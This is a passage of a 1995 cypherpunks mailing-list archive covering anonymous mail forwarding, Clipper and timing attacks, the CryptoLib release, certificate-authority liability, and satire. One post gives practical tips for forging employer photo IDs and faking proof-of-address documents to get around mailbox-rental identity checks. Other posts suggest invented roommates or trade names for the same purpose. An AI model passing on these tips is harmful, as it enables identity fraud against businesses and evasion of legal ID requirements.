> (503)-434-2426 brianc@linfield.edu
> Professionals built the Titanic, amateurs built the Ark...

However, the Ark was *designed* by GOD (if you believe the story).  Can Dr.  
Brian L. Crissey say the same thing about his payment system?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 15 Dec 1995 13:55:41 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <9512132329.AA01184@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith writes:
>         There's one problem with this in regards to the "no necessary
>  connection," and that's the governmental requirement for mail
>  forwarding. MBE and any legal other one will want to see at least
>  two forms of ID including one photo, and have a form that they fill
>  out using that and send to the local post office. Anyone have a
>  way around this problem?

Why does an account provider need a snail-address and phone-number?  Usually  
for billing purposes.  However, this isn't necessary for accounts paid with  
ECash.  I believe C2.org already offers non-dialup access accounts, paid for  
with ECash, that do not require a valid snail-address or phone-number.  I am  
sure that there will be many more to come.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (The user formerly known as Leslie Todd Masco)
Date: Thu, 14 Dec 1995 12:15:29 +0800
To: cypherpunks@toad.com
Subject: Re: IDEA encryption
Message-ID: <199512132337.SAA24071@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.LNX.3.91.951212212447.94B-100000@localhost>,
Mark M. <markm@omni.voicenet.com> wrote:
>> Last thing -- how secure is unix "rm"?  If something is rm'd, is it 
>> really really gone? 
>> 
>
>Not very secure.  I have heard that there is a Linux undelete and there might
>be a similar program for other Unices.  If the hard drive is examined using
>special hardware, data will be recoverable. 

It's not even that secure.  As long as the blocks haven't been written over,
you can extract the information from the raw device driver with 'dd' as
root.
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMM9juyoZzwIn1bdtAQFXZAGA4HlzYVD4ORp5LecGxw16q+ELXZFChIuA
kSHufPYuGQjsVDuQ0Ev4Xkroc3kVfZTQ
=1vxa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Dec 1995 18:16:38 +0800
To: cypherpunks@toad.com
Subject: Re:  OSF security announcement
Message-ID: <9512132353.AA16969@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


There are two or three dce-web folks on this list, so if anyone has questions
after reading the web pages (http://www.osf.org/www/dceweb), drop me a line
or post.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Thu, 14 Dec 1995 10:33:36 +0800
To: cypherpunks@toad.com
Subject: Re: Attacking Clipper with timing info?
In-Reply-To: <9512132111.AA18490@bilbo.suite.com>
Message-ID: <Pine.LNX.3.91.951213184958.140A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Dec 1995, Jim Miller wrote:

> 
> Could this timing attack be used to obtain the various keys used by  
> Clipper devices?
> 
> Jim_Miller@suite.com
> 
> 

The Clipper chip itself does not use digital signatures and public key
encryption.  It only implements a block cypher.  You were probably talking
about Capstone which does use PK crypto and digital signatures.  Capstone
uses DSS as the digital signature which is explicitly pointed out in the
summary of the timing attack.  I don't think what algorithm it uses for
key exchange has been released yet, but it probably is vulnerable.  So
Capstone is indeed vulnerable to timing attacks.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM9n1bZc+sv5siulAQFiogP/ZoGwK/gJpEyGhfQhHx8MM9pA/BPO36ZK
C/lFiOn1DhisqV+o2uYz8noRInr76fhO2drxCzACq1hCt3EAq9rXTmTDZeQOxHQS
6nT8VE5GJH54TwbTn5yeG2w7FUUDFeOYyu/aGQTIztAaUwJ3vLJSnP6ze50BTXI9
JJeziR8yBqE=
=b6p3
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Thu, 14 Dec 1995 13:39:15 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <199512140317.TAA06107@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith writes (quoting me):

>>netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage
>>or forwarding for people; they let you sign up for a trial month for free.
>>They ask for name/address/phone (which could easily be a Mailboxes Etc
>>address and a voicemail from Mailboxes Etc or whatever) and accept payment
>>by check or credit card.
>--------------------
>       There's one problem with this in regards to the "no necessary
>connection," and that's the governmental requirement for mail forwarding.
>MBE and any legal other one will want to see at least two forms of ID
>including one photo, and have a form that they fill out using that and
>send to the local post office. Anyone have a way around this problem?

I spent last summer in San Diego - it took me a couple of weeks to find a
place to stay. The first day I was in town I went to an MBE and signed up
for a box - showed them my Oregon ID and said "I don't have a local phone #
or address because I've been in town only 12 hours. That's what I need you
folks for." They cheerfully wrote down the information from the front of my
drivers' license (which is 5 years out of date) and gave me a box. They also
asked if there would be anyone else who'd be getting mail at my box - I
could have specified a business or some roommates. They didn't need to see
ID for those - so you're free to name some real or imagined
roommates/friends, who might coincidentally sign up for E-mail forwarding.
(Or you can just say that "Greg is my real name but John Doe is my trade
name, I get mail under that name too." "Trade names" aren't so unusual for
people in show business or authors or, I read recently, bill collectors.
Apparently they don't want people calling them up at home hassling them.
Imagine that. :) ) The folks at the San Diego MBE have been cheerfully
forwarding my paper mail back here to Oregon as long as I want to keep
paying the postage (plus some sum that they're adding on that's not big
enough to pay attention to). 

It's not the kind of untraceability I'd rely on vis-a-vis a TLA, but it
ought to be good enough to keep your posts to alt.sex.forbidden from showing
up on your boss' desk via DejaNews, or to allow you to go ahead and piss off
part-time fascists who don't have the energy to chase down the paper trail.
--
"The anchored mind screwed into me by the psycho-    Greg Broiles
lubricious thrust of heaven is the one that thinks   
every temptation, every desire, every inhibition."   greg@goldenbear.com
	-- Antonin Artaud		   gbroiles@darkwing.uoregon.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 14 Dec 1995 10:59:02 +0800
To: cypherpunks@toad.com
Subject: CryptoLib 1.0 now available
Message-ID: <199512140032.TAA27224@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note! This is posted for Jack Lacy; please direct responses to him
at cryptolib@research.att.com.  -matt]

Announcing CryptoLib - Release 1.0		12/13/95
   Jack Lacy, AT&T Bell Labs

CryptoLib is a portable and efficient library of primitives
for building cryptographic applications.  It runs under most versions
of Unix as well as DOS, Windows and Windows-NT (and 95).

We are pleased to make CryptoLib source code available without charge
to researchers and developers in the US and Canada.  (Because of export
restrictions on cryptographic software, we are only able to make the
software available within the US and Canada to US and Canadian citizens
and US permanent residents.)

CryptoLib is intended for research and experimental use, and is
distributed without warranty or support.  In particular, please
note the following license conditions:

 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software may be subject to export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

The attached describes the library and some timing results.

To obtain source code send electronic mail to:

	cryptolib@research.att.com

with a statement of the following form:

	"I am a U.S. or Canadian citizen or a legal permanent resident of the
	U.S. and am aware that some parts of CryptoLib may be restricted under
	United States export regulations.  I have read and understand the
	CryptoLib license."

	Name:
	Location:
	E-mail:
	Are you licensed to use the RSA patent?
	   If yes, give name of licensed organization:
		
===============================================================================

CryptoLib includes the following:

	arbitrary length bignums.

	bigmath package:
		bigAdd, bigSubtract, bigMultiply, bigDivide,
		bigLeftShift, bigRightShift,
		bigAnd, bigOr, bigXor, bigCopy,
		Euclid's extended GCD,
		modular reduction and exponentiation

	crypto primitives
		DES and 3DES + modes
		Diffie-Hellman
		DSA (Signing and verification roughly equally efficient)
		El Gamal
		Rabin's scheme
		Random Number generation (PSEUDO and TRUE)
		MD[2,4,5]
		Prime generation
		RSA (provided only if you convince me that you have a license)
		SHA
		truerand (For Unix, NT and 95)
		quantization (Defense against Kocher's timing attack)
		quantized RSA, DSA and El Gamal private key operations.
		
	support functions
		asn1.c
		ioutils.c
		netIface.c

Some timing information:

All times assume 32X32 bit assembly of multiplication primitives.

bigPow times (a^b mod c with a,b,c the same length)

		512 bits	1024 bits
		--------	---------
bigPow		0.12s		0.72s		Sparc II Brickell bigpow
		0.43s		3.0s		Sparc II with asm (gcc)
		0.12s		0.78s		Sparc 10 with asm
		0.03s		0.17s		Sparc 10 with asm (Brickell)
		0.084s		0.45s		SGI Indigo (150MHz)
		0.109s		0.75s		100 MHz Pentium (gcc under DOS)

Strong Prime Generation -- ProbTestAttempts = 5
100 primes generated in each test.  Times below are:
(total test time)/100 = avg. time per prime generated.
Using Gordon's strong prime algorithm.

    256		512	1024	Machine
    ---		---	----	-------
    2.8s	24.0s	5.11m	Sparc II 
    .45s	2.7s	77s	100 MHz pentium
	


	RSA Times (64 bit public exponent, message encrypted is full length)
	---------

		512	768	1024 bits	machine
		---	---	---------	-------
encrypt		30ms	50ms	80ms		sparc II
decrypt		160ms	480ms	930ms

encrypt		15ms	33ms	56ms		100 MHz Pentium (Under NT)
decrypt		38ms	104ms	214ms


	DSA Times
	---------

		512	768	1024 bits	machine
		---	---	---------	-------
sign		99ms	166ms	216ms		sparc II (Brickell speedup)
verify		156ms	316ms	416ms

sign		21ms	38ms	49ms		100 MHz Pentium (Under NT)
verify		27ms	43ms	71ms





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Thu, 14 Dec 1995 12:50:13 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: Attacking Clipper with timing info?
In-Reply-To: <9512132111.AA18490@bilbo.suite.com>
Message-ID: <9512140210.AA12418@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: jim@bilbo.suite.com (Jim Miller)
>Date: Wed, 13 Dec 95 15:10:25 -0600

>Could this timing attack be used to obtain the various keys used by  
>Clipper devices?

Jim,

Without having the details of the algorithm, I suspect the answer is
'remotely possible, at best'.

However, to extend what I suspect you were getting at:

It would be very interesting to determine if the NSA knew about this
crypto-design problem and put effort into making Clipper chips resistant
to this timing based attack.  Without access to internal documents,
I suspect this would be hard to determine.  We could learn something
about the NSA by studying the Clipper chip (or the follow-on PCMCIA
product containing SKIPJACK, Capstone).

If it could be shown that Clipper chips require a different amount of
time/current to encode/decode traffic, then we could conclude one of
the following:

(A1) The NSA knew about the problem, expected to be able to use the
     behavior as an illegal backdoor and thus did nothing to close it.
(A2) The NSA knew about the problem, expected that no one (including
     themselves) would be able to exploit the behavior, and thus did
     nothing to close it.
(A3) The NSA didn't know about the problem.

Conclusions A1 and A3 would tend to make the NSA look bad.  A2
would be fine, if the NSA expectation was found to be valid.  To
restate, without internal documents, outsiders would have little
ability to determine which conclusion to draw even if differences
in behavior were detected.

If it could be shown that Clipper chips require a fixed amount
of time/current to encode/decode traffic, then we could conclude
one of the following:

(B1) The NSA knew about the issue and compensated for it.
(B2) The NSA didn't know about the issue and got lucky.

I discount B2 as a valid option.  Actually, if the answer was B1,
my respect for the NSA would creep up a notch. :-)

Regards,
Loren

- -- 
Loren J. Rittle (rittle@comm.mot.com)	PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)	FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.				FP2048:FDC0292446937F2A240BC07D42763672
(708) 576-7794				Call for verification of fingerprints.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Fri, 15 Dec 1995 01:10:11 +0800
To: rittle@comm.mot.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <9512140222.AA23036@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain




> Without having the details of the algorithm, I suspect
> the answer is 'remotely possible, at best'.
>
> However, to extend what I suspect you were getting at:
>
> It would be very interesting to determine if the NSA knew
> about this crypto-design problem...


That was indeed what I was wondering.  I expect we won't have to wait too  
long before we hear whether Clipper chips require the same or a different  
amount of time to encrypt/decrypt.  Should be interesting.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 15 Dec 1995 09:02:27 +0800
To: hfinney@shell.portal.com
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <01HYRJSUSFLS8Y4Z3G@mbcl.rutgers.edu>
Message-ID: <199512140217.VAA11922@homeport.org>
MIME-Version: 1.0
Content-Type: text


::
Encrypted: PGP

::
Request-Remailing-To: hroller@c2.org

##
Subject: Re: e-mail forwarding, for-pay remailers

::
Encrypted: PGP

::
Request-Remailing-To: homer@rahul.net

##
Subject: Re: e-mail forwarding, for-pay remailers

::
Encrypted: PGP

::
Request-Remailing-To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)

##
Subject: Re: e-mail forwarding, for-pay remailers

Photo IDs are easy to make for your employer, the law offices of Dewy,
Lye, and Howe.  Stick on laminate from an art supply store.  Good
thing to have.  Don't forget the SSN style employee id number.

Those forms they send to a post office?  They don't check for the real
address. MBE just needs 'proof' that it's yours.  Again, your local
laser printer and an electricity bill do just fine.  They don't need
to keep the original; so the evidence is a bad photocopy.  The trick
is to make all this easy to accept & not make a fuss about the
information.  Meekly hand it over.



>> netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage
>> or forwarding for people; they let you sign up for a trial month for free.
>> They ask for name/address/phone (which could easily be a Mailboxes Etc
>> address and a voicemail from Mailboxes Etc or whatever) and accept payment
>> by check or credit card. They'll store incoming email or forward it to
>> another account. They'll do header rewriting (similar to the anonymous
>> remailers) so that outgoing mail looks like it came from this address.

>        There's one problem with this in regards to the "no necessary
>connection," and that's the governmental requirement for mail
>forwarding. MBE and any legal other one will want to see at least two
>forms of ID including one photo, and have a form that they fill out
>using that and send to the local post office. Anyone have a way around
>this problem?
>        -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 14 Dec 1995 14:40:23 +0800
To: Matthias Schunter <dklur@dttus.com>
Subject: Re: e-Cash: CAFE vs. Mondex
Message-ID: <199512140600.WAA26003@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:34 AM 12/12/95 +0100, Matthias Schunter wrote:
> We will soon publish our full protocol and architecture specifications.
> A short 50-page summary is already available (PostScript). 

While I appreciate all the good work you guys are doing, it is often
said that when people wish to nominally make things public without 
the risk of too many people paying attention, they make a postscript 
file, and when they really want the world to know, they make a bunch
of html files.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 14 Dec 1995 06:33:35 +0800
To: cypherpunks@toad.com
Subject: Re: PGP status in russia
In-Reply-To: <PasPossible-1012951419480001@ppp073-sf2.sirius.com>
Message-ID: <Pine.HPP.3.91.951213214157.13017A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, JustMe wrote:

> does anybody know the legal status
> of using encrypted email in russia?

Probably forbidden without a government license.
See: http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Mats






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Thu, 14 Dec 1995 17:43:36 +0800
To: mab@research.att.com (Matt Blaze)
Subject: Re: CryptoLib 1.0 now available
In-Reply-To: <199512140032.TAA27224@nsa.tempo.att.com>
Message-ID: <199512140448.VAA18190@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> CryptoLib includes the following:
[...]
> 		quantization (Defense against Kocher's timing attack)
> 		quantized RSA, DSA and El Gamal private key operations.


Maybe this is an incorrect conclusion, but here seems to be a _second_ group
who knew about Kocher's timing attack before Kocher did. What on earth
would ECash or ATT have to gain by keeping such knowledge a secret? 

                                   -- Will






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
Date: Fri, 15 Dec 1995 11:21:52 +0800
To: cypherpunks@toad.com
Subject: [NOISE] The Enquirer
Message-ID: <199512140350.VAA20825@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


The Podunk, Idaho Cypherpunks chapter held its annual meeting this past
weekend at Buffalo Jim's Bar and Grill, where the sole attending member,
Frank Semalo, was promptly arrested by local authorities for wearing a
"munitions" T-shirt.  He was released the next morning when the NSA confirmed
that the T-shirt was probably legal to wear in Podunk as long as Mr. Semalo
did not enter the local Mexican or Chinese restaurants.

By a 17-13 vote today, the Remailer Operators Association decided to start
sending out ALL anonymous remailer e-mail with a header entry of:
From: Alice de 'nonymous.

Surgeons at Netscape Communications successfully removed Jim Clark's foot
from his mouth today.  The foot was reported to be doing fine, but a little
wrinkled and in need of a good pedicure.  Company spokespersons reported
that the reason the foot was in there so long was that Mr. Clark was in
Washington, D.C. discussing the future of government regulation of the 
Internet with 'top government officials', and could not return to Mountain
View for surgery until recently.  In related medical news, proctologists at 
Bethesda Naval Hospital reported that Louis Freeh's head was still
firmly stuck.

Spam of the month:  Friend

The International Society for the Prevention of Cruelty to Animals announced
today that it was investigating the Blue Wave Corporation to determine if
any of the snakes were harmed or killed in the production of its signature
product, SimplySafe.

Just a coincidence?  Immediately after Tim May announces that he will not
be discussing Netscape anymore because he's making some financial plays on
the stock (hinting that he's probably shorting it), it drops 30 points?  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 16 Dec 1995 02:16:23 +0800
To: bryce@colorado.edu
Subject: Re: Web O Trust, active attacks against same, etc.  AGAIN.  (was: Usability of Cryptography (was Re: More FUD from First Virtual) )
Message-ID: <199512140616.WAA28005@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:39 PM 12/13/95 -0700, Bryce wrote:
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
> An entity calling itself "James A. Donald" <jamesd@echeque.com> 
>allegedly wrote:
>>
>> Web of trust is a mess because it attempts to link keys to 
>> physical people, which in general cannot be done.
>                   *******************************
>
>
>Do you wish to substantiate this rather brazen assertion?  
>I am very sure that PGP public key 0xCC56B2E9 belongs to my
>housemate Sebastian Kuzminsky <kuzminsk@colorado.edu>.  Is
>there some reason why I should doubt this belief?

No, but there is some reason you should gain familiarity with 
the English language.

If I had intended to say "generally cannot be done"  I would have
said "generally cannot be done" instead of saying "in general cannot 
be done".



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sat, 16 Dec 1995 02:23:01 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] The Enquirer
Message-ID: <9512140621.AA27244@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



Now, THAT's what I call "The News Update".
This is the kind of encapsulated [NOISE] we could all stand to hear!
ha-ha-ha

  ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Thu, 14 Dec 1995 14:15:15 +0800
To: herbs@connobj.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <9512140458.AA25132@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



> >If it could be shown that Clipper chips require a fixed amount
> >of time/current to encode/decode traffic, then we could conclude
> >one of the following:
> >
> >(B1) The NSA knew about the issue and compensated for it.
>
> Remember those carefully-chosen S-box numbers for DES
> and how, years later, how they just happened to turn out to
> be optimal for defending against the newly-discovered
> (in non-military circles) technique of differential
> cryptanalysis... :-) 


That brings up an issue I occasionally think about...At what point does  
NSA's secrecy become more of a liability than an asset.  Should the NSA  
reveal flaws in crypto-systems in wide use here in the US to protect US  
companies and individuals from attack or should they remain quiet so they  
can exploit them in the interests of national security?

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 14 Dec 1995 16:25:33 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <199512140742.XAA06927@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>E. Allen Smith writes:
>>         There's one problem with this in regards to the "no necessary
>>  connection," and that's the governmental requirement for mail
>>  forwarding. MBE and any legal other one will want to see at least
>>  two forms of ID including one photo, and have a form that they fill
>>  out using that and send to the local post office. Anyone have a
>>  way around this problem?

There are two different sets of relevant rules in the US - Post Office and
state.  The PO's primary interest is making sure you don't mind if they don't
forward your mail once you stop using the Commercial Mail Receiving Agent
(CMRA) and secondarily that you aren't committing fraud by using the mailbox,
sending people change-of-address notices, ripping off your creditors, and
skipping town.  California has a hopelessly dishonest law that just went
into effect in 1995, which pretends to be designed to protect consumers from
fraud by the 7 million small businesses in CA that use mailboxes,
and actually requires that _anybody_, business or not, who wants to rent
a mailbox must fill out the Post Office form and also appoint the PO or CMRA
as their agent for service of process and give them up-to-date True Addresses.
The PO, meanwhile, "usually wants" a California Driver's License plus another
ID to rent a box from them.  (I didn't have such a thing when I last rented a
box, and the PO hassled my mailbox company into asking for one when the new
law came out.)  After many attempts at calling the PO to get anybody
who knows the _official_ rules for what ID is required, I found a PO lawyer
who told me the rules are in the "Domestic Mail Manual", which any
Postmaster has, so my next step is to look up one of those before I next get
a mailbox.

So maybe a random photo ID will work, such as your FooBar Consulting
Employee ID, and maybe it won't, depending on what state you live in and
how clueless your local Post Office bureaucrats are.

At 05:29 PM 12/13/95 -0600, Andrew Loewenstern 
<andrew_loewenstern@il.us.swissbank.com> wrote:

> I believe C2.org already offers non-dialup access accounts, paid for  
>with ECash, that do not require a valid snail-address or phone-number.  
>I am sure that there will be many more to come.

I suspect Sameer would be happy to open an account paid in advance in
small unmarked bills.  AOL probably wouldn't.  Fortunately, the government
hasn't really caught on to the importance of email, so they aren't requiring
that email providers know where you really live.  I predict 1997 for that.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Thu, 14 Dec 1995 13:56:12 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <199512140443.XAA19961@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 20:10 12.13.1995 CST, Loren James Rittle wrote:
>If it could be shown that Clipper chips require a fixed amount
>of time/current to encode/decode traffic, then we could conclude
>one of the following:
>
>(B1) The NSA knew about the issue and compensated for it.
>(B2) The NSA didn't know about the issue and got lucky.
>
>I discount B2 as a valid option.  Actually, if the answer was B1,
>my respect for the NSA would creep up a notch. :-)

Remember those carefully-chosen S-box numbers for DES and how, years later,
how they just happened to turn out to be optimal for defending against the
newly-discovered (in non-military circles) technique of differential
cryptanalysis... :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter (herbs@connobj.com)

Connected Object Solutions     2228 Urwin - Suite 102     voice 416-618-0184
http://www.connobj.com/      Oakville ON Canada L6L 2T2     fax 905-847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 14 Dec 1995 15:14:54 +0800
To: cypherpunks@toad.com
Subject: 3rd party beneficiaries and certificates
Message-ID: <199512140518.AAA30556@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dear cypherpunks:

Professor Froomkin posted the following interesting questions to
cyberia-L, and gave me permission to repost them here. Please
direct any private replies to him <froomkin@law.miami.edu>. My
apologies to those of you who hang out in both dens for having
to see the same message twice.
JMR
[Forwarded message follows]

I've been trying to work something out.  

(I've written these questions in the form of an exam because it's that 
time of year.  In fact, I'm struggling with these in a paper I'm working on.)

Carol runs a certificate authority (CA).  She sells a certificate to Alice
binding Alice's public key to her name and email address.  In version (A)
of the contract Carol posts the certificate on her web site.  In version
(B) of the contract Alice gets a floppy disk with the certificate.

The certificate is in error (due to Alice's fraudulent or negligent 
misrepresentation to Carol).  Bob relies on it to his detriment in a 
transaction with Alice.  Assume Bob can show but for causation of his loss.

Bob now wishes to sue Carol for negligent misrepresentation.  
He has, I think, three possible theories.

1) UCC.  This turns on whether a certificate is a "good" or a "service". 
{Assume the answer is "service" for the rest of this hypo}

2) Contract.  Bob has to show that he's an intended beneficiary under the 
restatement 2d test.  This seems to be almost a theological question.  Is 
the purpose of the certificate to give Alice a tool to induce Bob to 
transact, or to give Bob a benefit without which he will not transact?

3) Tort of negligent misrepresentation.  To make this especially exciting, 
let's assume all the action is in NY where the shadow of Cardozo still 
looms.  NY retains a strong privity rule: You can only recover for a 
negligent misrepresentation if you are in privity of contract with the 
speaker.

Question 1: If Bob is an intended beneficiary, is he in privity with 
Carol? (I think the answer is "yes").

Question 2: Are Bob's rights, or his status as an intended beneficiary, 
affected by whether the contract is form A or form B above?  The classic 
cases, like Ultramares have the accountant's report spread around by the 
client.  Suppose the accountant in Ultramares instead publishes the 
report on the Web -- what result?

OK, now we change the facts.  We're not in NY anymore, we are in a state 
that follows the restatement 2d rule in sec. 552.  

Question 3: Is Bob within the class of foreseeable users entitled to
recover for the tort of negligent misrepresentation as these terms are
used in the restatement?

Question 4: Is the certificate a good or a service? (I say it's a 
service, mostly, unless it makes no representations at all about its 
quality.)

Extra credit: Look up 

http://www.verisign.com/netscape/legal.html

and find the disclaimers in THE BIG TYPE.  Do you know of any court that 
would enforce these?   On a "good"?  On a "service" provider?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.
[End forwarded message]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 15 Dec 1995 02:26:49 +0800
To: "W. Kinney" <kinney@bogart.colorado.edu>
Subject: Re: CryptoLib 1.0 now available
In-Reply-To: <199512140448.VAA18190@bogart.Colorado.EDU>
Message-ID: <199512140526.AAA27695@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>> CryptoLib includes the following:
>[...]
>> 		quantization (Defense against Kocher's timing attack)
>> 		quantized RSA, DSA and El Gamal private key operations.
>
>
>Maybe this is an incorrect conclusion, but here seems to be a _second_ group
>who knew about Kocher's timing attack before Kocher did. What on earth
>would ECash or ATT have to gain by keeping such knowledge a secret? 
>
>                                   -- Will
>
>

Although it's very tempting to come up with an elaborate confession to
being part of the big conspiracy of the powers-that-be to suppress our
most brilliant cryptologic discoveries, I must admit that in fact you have
reached an incorrect conclusion.  I added the quantization stuff to
CryptoLib over the weekend right after I read Kocher's paper.  I posted the
routines to cypherpunks and sci.crypt yesterday.  You must have missed it.

Also, it should be pointed out that the idea that timing information
can leak information (like bit density) about keys has been well-known
